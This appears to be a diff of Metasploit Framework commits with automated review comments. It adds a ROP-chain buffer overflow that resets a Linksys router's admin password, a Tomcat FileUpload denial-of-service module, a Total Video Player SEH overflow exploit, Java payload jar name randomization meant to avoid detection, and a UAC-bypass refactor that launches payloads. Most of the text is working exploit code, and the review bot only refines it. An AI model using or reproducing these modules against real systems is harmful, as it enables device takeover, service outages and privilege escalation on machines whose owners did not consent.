opts[:arch] ||= payload_instance.arch if self.respond_to? :payload_instance
|
||||||
opts[:arch] ||= target_arch if self.respond_to? :target_arch
|
opts[:arch] ||= target_arch if self.respond_to? :target_arch
|
||||||
opts[:arch] ||= arch if self.respond_to? :arch
|
opts[:arch] ||= arch if self.respond_to? :arch
|
||||||
end
|
end
|
||||||
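Review bot: `self.respond_to? :payload_instance` only proves the method exists, not that it returns an object, so `payload_instance.platform` and `payload_instance.arch` will raise `NoMethodError` on `nil` if the accessor can be unset at this point (I cannot see its definition from here). If that is possible, guard the value as well: `opts[:platform] ||= payload_instance.platform if self.respond_to?(:payload_instance) && payload_instance`, and the same for `:arch`. The enclosing method starts before this hunk.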
|
|
|
@ -42,6 +42,8 @@ module Msf::Payload::Java
|
||||||
#
|
#
|
||||||
# @option opts :main_class [String] the name of the Main-Class
|
# @option opts :main_class [String] the name of the Main-Class
|
||||||
# attribute in the manifest. Defaults to "metasploit.Payload"
|
# attribute in the manifest. Defaults to "metasploit.Payload"
|
||||||
|
# @option opts :random [Boolean] Set to `true` to randomize the
|
||||||
|
# "metasploit" package name.
|
||||||
# @return [Rex::Zip::Jar]
|
# @return [Rex::Zip::Jar]
|
||||||
def generate_jar(opts={})
|
def generate_jar(opts={})
|
||||||
raise if not respond_to? :config
|
raise if not respond_to? :config
|
||||||
|
@ -54,6 +56,7 @@ module Msf::Payload::Java
|
||||||
] + @class_files
|
] + @class_files
|
||||||
|
|
||||||
jar = Rex::Zip::Jar.new
|
jar = Rex::Zip::Jar.new
|
||||||
|
jar.add_sub("metasploit") if opts[:random]
|
||||||
jar.add_file("metasploit.dat", config)
|
jar.add_file("metasploit.dat", config)
|
||||||
jar.add_files(paths, File.join(Msf::Config.data_directory, "java"))
|
jar.add_files(paths, File.join(Msf::Config.data_directory, "java"))
|
||||||
jar.build_manifest(:main_class => main_class)
|
jar.build_manifest(:main_class => main_class)
|
||||||
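Review bot: `jar.add_sub("metasploit") if opts[:random]` is placed correctly between `Jar.new` and the first `add_file`, but nothing at the call site says why the order matters; `Jar#add_sub` documents that substitutions must be registered immediately after `initialize`, and `Jar#add_file` rewrites both the entry name and its contents. A comment such as `# Must precede add_file/add_files: Jar#add_file applies substitutions to names and contents` would keep a later edit from moving it. Whether `add_files` routes through the overridden `add_file` is not visible here, so the `.class` entries being randomized consistently with the manifest is worth confirming.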
|
|
|
@ -120,6 +120,23 @@ module Msf::Post::Common
|
||||||
return o
|
return o
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def cmd_exec_get_pid(cmd, args=nil, time_out=15)
|
||||||
|
case session.type
|
||||||
|
when /meterpreter/
|
||||||
|
if args.nil? and cmd =~ /[^a-zA-Z0-9\/._-]/
|
||||||
|
args = ""
|
||||||
|
end
|
||||||
|
session.response_timeout = time_out
|
||||||
|
process = session.sys.process.execute(cmd, args, {'Hidden' => true, 'Channelized' => true})
|
||||||
|
process.channel.close
|
||||||
|
pid = process.pid
|
||||||
|
process.close
|
||||||
|
pid
|
||||||
|
else
|
||||||
|
print_error "cmd_exec_get_pid is incompatible with non-meterpreter sessions"
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Reports to the database that the host is a virtual machine and reports
|
# Reports to the database that the host is a virtual machine and reports
|
||||||
# the type of virtual machine it is (e.g VirtualBox, VMware, Xen)
|
# the type of virtual machine it is (e.g VirtualBox, VMware, Xen)
|
||||||
|
|
|
@ -824,10 +824,15 @@ class Db
|
||||||
tbl = Rex::Ui::Text::Table.new(tbl_opts)
|
tbl = Rex::Ui::Text::Table.new(tbl_opts)
|
||||||
|
|
||||||
creds_returned = 0
|
creds_returned = 0
|
||||||
|
inactive_count = 0
|
||||||
# Now do the actual search
|
# Now do the actual search
|
||||||
framework.db.each_cred(framework.db.workspace) do |cred|
|
framework.db.each_cred(framework.db.workspace) do |cred|
|
||||||
# skip if it's inactive and user didn't ask for all
|
# skip if it's inactive and user didn't ask for all
|
||||||
next unless (cred.active or inactive_ok)
|
if !cred.active && !inactive_ok
|
||||||
|
inactive_count += 1
|
||||||
|
next
|
||||||
|
end
|
||||||
|
|
||||||
if search_term
|
if search_term
|
||||||
next unless cred.attribute_names.any? { |a| cred[a.intern].to_s.match(search_term) }
|
next unless cred.attribute_names.any? { |a| cred[a.intern].to_s.match(search_term) }
|
||||||
end
|
end
|
||||||
|
@ -876,8 +881,15 @@ class Db
|
||||||
end
|
end
|
||||||
|
|
||||||
print_line
|
print_line
|
||||||
if (output_file == nil)
|
if output_file.nil?
|
||||||
print_line(tbl.to_s)
|
print_line(tbl.to_s)
|
||||||
|
if !inactive_ok && inactive_count > 0
|
||||||
|
# Then we're not printing the inactive ones. Let the user know
|
||||||
|
# that there are some they are not seeing and how to get at
|
||||||
|
# them.
|
||||||
|
print_line "Also found #{inactive_count} inactive creds (`creds all` to list them)"
|
||||||
|
print_line
|
||||||
|
end
|
||||||
else
|
else
|
||||||
# create the output file
|
# create the output file
|
||||||
::File.open(output_file, "wb") { |f| f.write(tbl.to_csv) }
|
::File.open(output_file, "wb") { |f| f.write(tbl.to_csv) }
|
||||||
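Review bot: The "Also found N inactive creds" notice only fires inside the `if output_file.nil?` branch, so when the table is written to a CSV the inactive creds are dropped from the file with no indication that anything was filtered. Moving the `if !inactive_ok && inactive_count > 0` block after the `if`/`else` (it only calls `print_line`, which is independent of the output target) would report the omission in both paths. The `inactive_count` bookkeeping itself is fine and the `!cred.active && !inactive_ok` rewrite reads better than the old `next unless`.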
|
|
|
@ -972,6 +972,7 @@ require 'msf/core/exe/segment_injector'
|
||||||
spawn = opts[:spawn] || 2
|
spawn = opts[:spawn] || 2
|
||||||
exe_name = Rex::Text.rand_text_alpha(8) + ".exe"
|
exe_name = Rex::Text.rand_text_alpha(8) + ".exe"
|
||||||
zip = Rex::Zip::Jar.new
|
zip = Rex::Zip::Jar.new
|
||||||
|
zip.add_sub("metasploit") if opts[:random]
|
||||||
paths = [
|
paths = [
|
||||||
[ "metasploit", "Payload.class" ],
|
[ "metasploit", "Payload.class" ],
|
||||||
]
|
]
|
||||||
|
|
|
@ -15,6 +15,17 @@ module Zip
|
||||||
#
|
#
|
||||||
class Jar < Archive
|
class Jar < Archive
|
||||||
attr_accessor :manifest
|
attr_accessor :manifest
|
||||||
|
# @!attribute [rw] substitutions
|
||||||
|
# The substitutions to apply when randomizing. Randomization is designed to
|
||||||
|
# be used in packages and/or classes names.
|
||||||
|
#
|
||||||
|
# @return [Hash]
|
||||||
|
attr_accessor :substitutions
|
||||||
|
|
||||||
|
def initialize
|
||||||
|
@substitutions = {}
|
||||||
|
super
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Create a MANIFEST.MF file based on the current Archive#entries.
|
# Create a MANIFEST.MF file based on the current Archive#entries.
|
||||||
|
@ -35,8 +46,8 @@ class Jar < Archive
|
||||||
# The SHA1-Digest lines are optional unless the jar is signed (see #sign).
|
# The SHA1-Digest lines are optional unless the jar is signed (see #sign).
|
||||||
#
|
#
|
||||||
def build_manifest(opts={})
|
def build_manifest(opts={})
|
||||||
main_class = opts[:main_class] || nil
|
main_class = (opts[:main_class] ? randomize(opts[:main_class]) : nil)
|
||||||
app_name = opts[:app_name] || nil
|
app_name = (opts[:app_name] ? randomize(opts[:main_class]) : nil)
|
||||||
existing_manifest = nil
|
existing_manifest = nil
|
||||||
|
|
||||||
@manifest = "Manifest-Version: 1.0\r\n"
|
@manifest = "Manifest-Version: 1.0\r\n"
|
||||||
|
@ -224,6 +235,47 @@ class Jar < Archive
|
||||||
return true
|
return true
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Adds a file to the JAR, randomizing the file name
|
||||||
|
# and the contents.
|
||||||
|
#
|
||||||
|
# @see Rex::Zip::Archive#add_file
|
||||||
|
def add_file(fname, fdata=nil, xtra=nil, comment=nil)
|
||||||
|
super(randomize(fname), randomize(fdata), xtra, comment)
|
||||||
|
end
|
||||||
|
|
||||||
|
# Adds a substitution to have into account when randomizing. Substitutions
|
||||||
|
# must be added immediately after {#initialize}.
|
||||||
|
#
|
||||||
|
# @param str [String] String to substitute. It's designed to randomize
|
||||||
|
# class and/or package names.
|
||||||
|
# @param bad [String] String containing bad characters to avoid when
|
||||||
|
# applying substitutions.
|
||||||
|
# @return [String] The substitution which will be used when randomizing.
|
||||||
|
def add_sub(str, bad = '')
|
||||||
|
if @substitutions.key?(str)
|
||||||
|
return @substitutions[str]
|
||||||
|
end
|
||||||
|
|
||||||
|
@substitutions[str] = Rex::Text.rand_text_alpha(str.length, bad)
|
||||||
|
end
|
||||||
|
|
||||||
|
# Randomizes an input by applying the `substitutions` available.
|
||||||
|
#
|
||||||
|
# @param str [String] String to randomize.
|
||||||
|
# @return [String] The input `str` with all the possible `substitutions`
|
||||||
|
# applied.
|
||||||
|
def randomize(str)
|
||||||
|
return str if str.nil?
|
||||||
|
|
||||||
|
random = str
|
||||||
|
|
||||||
|
@substitutions.each do |orig, subs|
|
||||||
|
random = str.gsub(orig, subs)
|
||||||
|
end
|
||||||
|
|
||||||
|
random
|
||||||
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
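Review bot: In `build_manifest`, `app_name` is computed from the wrong key, so the manifest's app name gets the randomized main class: it should read `app_name = (opts[:app_name] ? randomize(opts[:app_name]) : nil)`. `randomize` has a second defect: each loop iteration restarts from `str` (`random = str.gsub(orig, subs)`), so with more than one substitution only the last one survives; it should be `random = random.gsub(orig, subs)`. A why-comment on `add_sub` would also help, since `rand_text_alpha(str.length, bad)` deliberately keeps the replacement the same length as the original, presumably so that byte-patching class-file contents in `add_file` leaves length-prefixed entries intact, which is worth stating and confirming.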
|
|
|
@ -0,0 +1,109 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Linksys WRT120N tmUnblock Buffer Overflow',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a buffer overflow vulnerability in the WRT120N Linksys router
|
||||||
|
to reset the password of the management interface temporarily to an empty value.
|
||||||
|
This module has been tested successfully on a WRT120N device with firmware version
|
||||||
|
1.0.07.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Craig Heffner', #vulnerability discovery and original exploit
|
||||||
|
'Michael Messner <devnull[at]s3cur1ty.de>' #metasploit module
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'EDB', '31758' ],
|
||||||
|
[ 'OSVDB', '103521' ],
|
||||||
|
[ 'URL', 'http://www.devttys0.com/2014/02/wrt120n-fprintf-stack-overflow/' ] # a huge amount of details about this vulnerability and the original exploit
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Feb 19 2014'))
|
||||||
|
end
|
||||||
|
|
||||||
|
def check_login(user)
|
||||||
|
print_status("#{peer} - Trying to login with #{user} and empty password")
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => '/',
|
||||||
|
'method' => 'GET',
|
||||||
|
'authorization' => basic_auth(user,"")
|
||||||
|
})
|
||||||
|
if res.nil? || res.code == 404
|
||||||
|
print_status("#{peer} - No successful login possible with #{user} and empty password")
|
||||||
|
return false
|
||||||
|
elsif [200, 301, 302].include?(res.code)
|
||||||
|
print_good("#{peer} - Successful login #{user} and empty password")
|
||||||
|
return true
|
||||||
|
else
|
||||||
|
print_status("#{peer} - No successful login possible with #{user} and empty password")
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
|
||||||
|
begin
|
||||||
|
if check_login("admin")
|
||||||
|
print_good("#{peer} - login with user admin and no password possible. There is no need to use this module.")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
rescue ::Rex::ConnectionError
|
||||||
|
print_error("#{peer} - Failed to connect to the web server")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("#{peer} - Resetting password for the admin user ...")
|
||||||
|
|
||||||
|
postdata = Rex::Text.rand_text_alpha(246) # Filler
|
||||||
|
postdata << [0x81544AF0].pack("N") # $s0, address of admin password in memory
|
||||||
|
postdata << [0x8031f634].pack("N") # $ra
|
||||||
|
postdata << Rex::Text.rand_text_alpha(40) # Stack filler
|
||||||
|
postdata << Rex::Text.rand_text_alpha(4) # Stack filler
|
||||||
|
postdata << [0x803471b8].pack("N") # ROP 1 $ra (address of ROP 2)
|
||||||
|
postdata << Rex::Text.rand_text_alpha(8) # Stack filler
|
||||||
|
|
||||||
|
(0..3).each do |i|
|
||||||
|
postdata << Rex::Text.rand_text_alpha(4) # ROP 2 $s0, don't care
|
||||||
|
postdata << Rex::Text.rand_text_alpha(4) # ROP 2 $s1, don't care
|
||||||
|
postdata << [0x803471b8].pack("N") # ROP 2 $ra (address of itself)
|
||||||
|
postdata << Rex::Text.rand_text_alpha(4-(3*(i/3))) # Stack filler
|
||||||
|
end
|
||||||
|
|
||||||
|
begin
|
||||||
|
res = send_request_cgi(
|
||||||
|
{
|
||||||
|
'uri' => normalize_uri("cgi-bin", "tmUnblock.cgi"),
|
||||||
|
'method' => 'POST',
|
||||||
|
'vars_post' => {
|
||||||
|
'period' => '0',
|
||||||
|
'TM_Block_MAC' => '00:01:02:03:04:05',
|
||||||
|
'TM_Block_URL' => postdata
|
||||||
|
}
|
||||||
|
})
|
||||||
|
if res and res.code == 500
|
||||||
|
if check_login("admin")
|
||||||
|
print_good("#{peer} - Expected answer and the login was successful. Try to login with the user admin and a blank password")
|
||||||
|
else
|
||||||
|
print_status("#{peer} - Expected answer, but unknown exploiting status. Try to login with the user admin and a blank password")
|
||||||
|
end
|
||||||
|
else
|
||||||
|
print_error("#{peer} - Unexpected answer. Exploiting attempt has failed")
|
||||||
|
end
|
||||||
|
rescue ::Rex::ConnectionError
|
||||||
|
print_error("#{peer} - Failed to connect to the web server")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
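Review bot: `check_login` has two branches that print the same failure message and return false (the `res.nil? || res.code == 404` arm and the `else` arm), so the method can be reduced to a single test, `success = res && [200, 301, 302].include?(res.code)`, followed by one `print_good`/`print_status` pair; that also removes the duplicated string. The header comment `# This module requires Metasploit: http//metasploit.com/download` is missing the colon after `http` (the same typo appears in the Tomcat module added in this commit). The `(4-(3*(i/3)))` filler length inside the `(0..3).each` loop is hard to read; a short comment saying that only the final iteration uses a 1-byte filler would save the next reader the arithmetic.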
|
|
@ -12,8 +12,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'John the Ripper Password Cracker (Fast Mode)',
|
'Name' => 'John the Ripper Password Cracker (Fast Mode)',
|
||||||
'Description' => %Q{
|
'Description' => %Q{
|
||||||
This module uses John the Ripper to identify weak passwords that have been
|
This module uses John the Ripper to identify weak passwords that have been
|
||||||
acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal
|
acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal
|
||||||
of this module is to find trivial passwords in a short amount of time. To
|
of this module is to find trivial passwords in a short amount of time. To
|
||||||
|
@ -21,8 +21,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
used outside of Metasploit. This initial version just handles LM/NTLM credentials
|
used outside of Metasploit. This initial version just handles LM/NTLM credentials
|
||||||
from hashdump and uses the standard wordlist and rules.
|
from hashdump and uses the standard wordlist and rules.
|
||||||
},
|
},
|
||||||
'Author' => 'hdm',
|
'Author' => 'hdm',
|
||||||
'License' => MSF_LICENSE # JtR itself is GPLv2, but this wrapper is MSF (BSD)
|
'License' => MSF_LICENSE # JtR itself is GPLv2, but this wrapper is MSF (BSD)
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -68,6 +68,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
cracked_lm = {}
|
cracked_lm = {}
|
||||||
added = []
|
added = []
|
||||||
|
|
||||||
|
john_crack(hashlist.path, :wordlist => datastore['Wordlist'], :format => 'lm')
|
||||||
|
john_crack(hashlist.path, :wordlist => datastore['Wordlist'], :format => 'nt')
|
||||||
|
|
||||||
# Crack this in LANMAN format using wordlist mode with tweaked rules
|
# Crack this in LANMAN format using wordlist mode with tweaked rules
|
||||||
john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'lm')
|
john_crack(hashlist.path, :wordlist => wordlist.path, :rules => 'single', :format => 'lm')
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,76 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http//metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit4 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Auxiliary::Dos
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',
|
||||||
|
'Description' => %q{
|
||||||
|
This module triggers an infinite loop in Apache Commons FileUpload 1.0
|
||||||
|
through 1.3 via a specially crafted Content-Type header.
|
||||||
|
Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle
|
||||||
|
mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
|
||||||
|
and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also
|
||||||
|
uses Commons FileUpload as part of the Manager application.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.
|
||||||
|
'ribeirux' # metasploit module
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['CVE', '2014-0050'],
|
||||||
|
['URL', 'http://markmail.org/message/kpfl7ax4el2owb3o'],
|
||||||
|
['URL', 'http://tomcat.apache.org/security-8.html'],
|
||||||
|
['URL', 'http://tomcat.apache.org/security-7.html']
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Feb 6 2014'
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
Opt::RPORT(8080),
|
||||||
|
OptString.new('TARGETURI', [ true, "The request URI", '/']),
|
||||||
|
OptInt.new('RLIMIT', [ true, "Number of requests to send",50])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
boundary = "0"*4092
|
||||||
|
opts = {
|
||||||
|
'method' => "POST",
|
||||||
|
'uri' => normalize_uri(target_uri.to_s),
|
||||||
|
'ctype' => "multipart/form-data; boundary=#{boundary}",
|
||||||
|
'data' => "#{boundary}00000",
|
||||||
|
'headers' => {
|
||||||
|
'Accept' => '*/*'
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
for x in 1..datastore['RLIMIT']
|
||||||
|
print_status("Sending request #{x} to #{peer}")
|
||||||
|
begin
|
||||||
|
c = connect
|
||||||
|
r = c.request_cgi(opts)
|
||||||
|
c.send_request(r)
|
||||||
|
# Don't wait for a response
|
||||||
|
rescue ::Rex::ConnectionError => exception
|
||||||
|
print_error("#{peer} - Unable to connect: '#{exception.message}'")
|
||||||
|
return
|
||||||
|
ensure
|
||||||
|
disconnect(c) if c
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
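Review bot: In `run`, `c` is assigned inside the `begin` and reused by `ensure`, so on the second and later iterations a `connect` that raises leaves `c` pointing at the previous, already-disconnected connection, which `disconnect(c) if c` then closes again; resetting it at the top of each iteration with `c = nil` avoids that. `for x in 1..datastore['RLIMIT']` is also non-idiomatic and leaks `x` into the method scope; `1.upto(datastore['RLIMIT']) do |x|` is the usual form. The header comment `http//metasploit.com/download` is missing its colon.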
|
|
|
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
res = r[0].to_s.strip
|
res = r[0].to_s.strip
|
||||||
if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/))
|
if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/))
|
||||||
print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)")
|
print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)")
|
||||||
report_service(:host => rhost, :port => rport, :name => "chargen", :info => res.length)
|
report_service(:host => rhost, :port => rport, :proto => "udp", :name => "chargen", :info => res.length)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
|
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
|
||||||
|
|
|
@ -134,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
# If we haven't returned yet, then this is a request for our applet
|
# If we haven't returned yet, then this is a request for our applet
|
||||||
# jar, build one for this victim.
|
# jar, build one for this victim.
|
||||||
jar = p.encoded_jar
|
jar = p.encoded_jar(:random => true)
|
||||||
|
|
||||||
jar.add_file("#{datastore["APPLETNAME"]}.class", @applet_class)
|
jar.add_file("#{datastore["APPLETNAME"]}.class", @applet_class)
|
||||||
|
|
||||||
|
|
|
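--- /dev/null
+++ b/[PATH NOT SHOWN ON PAGE]
@@ -0,0 +1,73 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = NormalRanking
+
+include Msf::Exploit::FILEFORMAT
+include Msf::Exploit::Seh
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow',
+'Description' => %q{
+This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability
+occurs opening malformed Settings.ini file e.g."C:\Program Files\Total Video Player\".
+This module has been tested successfully over Windows WinXp-Sp3-EN, Windows 7, Windows 8.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Mike Czumak', # (T_v3rn1x) -- @SecuritySift
+'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>' # Metasploit module
+],
+'References' =>
+[
+[ 'OSVDB', '100619' ],
+[ 'EDB', '29799' ]
+],
+'DefaultOptions' =>
+{
+'ExitFunction' => 'process',
+},
+'Platform' => 'win',
+'Payload' =>
+{
+'BadChars' => "\x00\x0a\x0d\xff",
+'Space' => 1787,
+'DisableNops' => true,
+},
+
+'Targets' =>
+[
+[ 'Windows Universal',
+{
+'Ret' => 0x10012848, # pop ebx # pop ecx # ret - hskin.dll
+'Offset' => 256
+}
+],
+],
+'Privileged' => false,
+'DisclosureDate' => 'Nov 24 2013',
+'DefaultTarget' => 0))
+
+register_options([OptString.new('FILENAME', [ false, 'The file name.', 'Settings.ini']),], self.class)
+
+end
+
+def exploit
+
+buffer = "[Support Groups]\r\nVideo="
+buffer << rand_text(target['Offset'])
+buffer << generate_seh_payload(target.ret)
+buffer << payload.encoded
+buffer << "\r\n[AssociateType]\r\nAssociateType =1"
+
+file_create(buffer)
+
+end
+end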
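Review bot: `exploit` assembles the file from two bare INI fragments, `"[Support Groups]\r\nVideo="` and `"\r\n[AssociateType]\r\nAssociateType =1"`, around a 256-byte filler, with no comment saying why these sections are required or what `Offset` measures, so a maintainer has nothing to go on when the target table changes. A line above `buffer = ...` such as `# Minimal Settings.ini the player parses; the Video= value carries the overflow (Offset bytes up to the SEH record)` would record that, and `'Offset' => 256` deserves a trailing `# bytes from the start of the Video= value to the SEH record` (hedged: the exact parse path is not shown here). The `FILENAME` description `'The file name.'` says less than the module description, which already states that the player reads `Settings.ini` from its install directory; the option text could say so.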
@ -29,7 +29,10 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
],
|
],
|
||||||
'Platform' => [ 'win' ],
|
'Platform' => [ 'win' ],
|
||||||
'SessionTypes' => [ 'meterpreter' ],
|
'SessionTypes' => [ 'meterpreter' ],
|
||||||
'Targets' => [ [ 'Windows', {} ] ],
|
'Targets' => [
|
||||||
|
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||||
|
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||||
|
],
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
'References' => [
|
'References' => [
|
||||||
[ 'URL', 'http://www.trustedsec.com/december-2010/bypass-windows-uac/' ]
|
[ 'URL', 'http://www.trustedsec.com/december-2010/bypass-windows-uac/' ]
|
||||||
|
@ -39,54 +42,10 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def runas_method
|
|
||||||
payload = generate_payload_exe
|
|
||||||
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
|
||||||
tmpdir = expand_path("%TEMP%")
|
|
||||||
tempexe = tmpdir + "\\" + payload_filename
|
|
||||||
write_file(tempexe, payload)
|
|
||||||
print_status("Uploading payload: #{tempexe}")
|
|
||||||
session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
|
|
||||||
print_status("Payload executed")
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
|
|
||||||
|
|
||||||
#
|
|
||||||
# Verify use against Vista+
|
|
||||||
#
|
|
||||||
winver = sysinfo["OS"]
|
|
||||||
if winver !~ /Windows Vista|Windows 2008|Windows [78]/
|
|
||||||
fail_with(Exploit::Failure::NotVulnerable, "#{winver} is not vulnerable.")
|
|
||||||
end
|
|
||||||
|
|
||||||
if is_uac_enabled?
|
|
||||||
print_status "UAC is Enabled, checking level..."
|
|
||||||
else
|
|
||||||
if is_in_admin_group?
|
|
||||||
fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
|
|
||||||
else
|
|
||||||
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
case get_uac_level
|
|
||||||
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
|
|
||||||
fail_with(Exploit::Failure::NotVulnerable,
|
|
||||||
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
|
|
||||||
)
|
|
||||||
when UAC_DEFAULT
|
|
||||||
print_good "UAC is set to Default"
|
|
||||||
print_good "BypassUAC can bypass this setting, continuing..."
|
|
||||||
when UAC_NO_PROMPT
|
|
||||||
print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
|
|
||||||
runas_method
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
|
def check_permissions!
|
||||||
# Check if you are an admin
|
# Check if you are an admin
|
||||||
print_status('Checking admin status...')
|
vprint_status('Checking admin status...')
|
||||||
admin_group = is_in_admin_group?
|
admin_group = is_in_admin_group?
|
||||||
|
|
||||||
if admin_group.nil?
|
if admin_group.nil?
|
||||||
|
@ -103,18 +62,60 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
|
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
|
||||||
fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
|
fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
|
||||||
end
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
validate_environment!
|
||||||
|
|
||||||
|
case get_uac_level
|
||||||
|
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
|
||||||
|
fail_with(Exploit::Failure::NotVulnerable,
|
||||||
|
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
|
||||||
|
)
|
||||||
|
when UAC_DEFAULT
|
||||||
|
print_good "UAC is set to Default"
|
||||||
|
print_good "BypassUAC can bypass this setting, continuing..."
|
||||||
|
when UAC_NO_PROMPT
|
||||||
|
print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
|
||||||
|
runas_method
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
check_permissions!
|
||||||
|
|
||||||
|
upload_binaries!
|
||||||
|
|
||||||
|
cmd = "#{path_bypass} /c #{path_payload}"
|
||||||
|
# execute the payload
|
||||||
|
pid = cmd_exec_get_pid(cmd)
|
||||||
|
|
||||||
|
::Timeout.timeout(30) do
|
||||||
|
until session_created? do
|
||||||
|
select(nil,nil,nil,1)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
session.sys.process.kill(pid)
|
||||||
|
# delete the uac bypass payload
|
||||||
|
file_rm(path_bypass)
|
||||||
|
file_rm("#{expand_path("%TEMP%")}\\tior.exe")
|
||||||
|
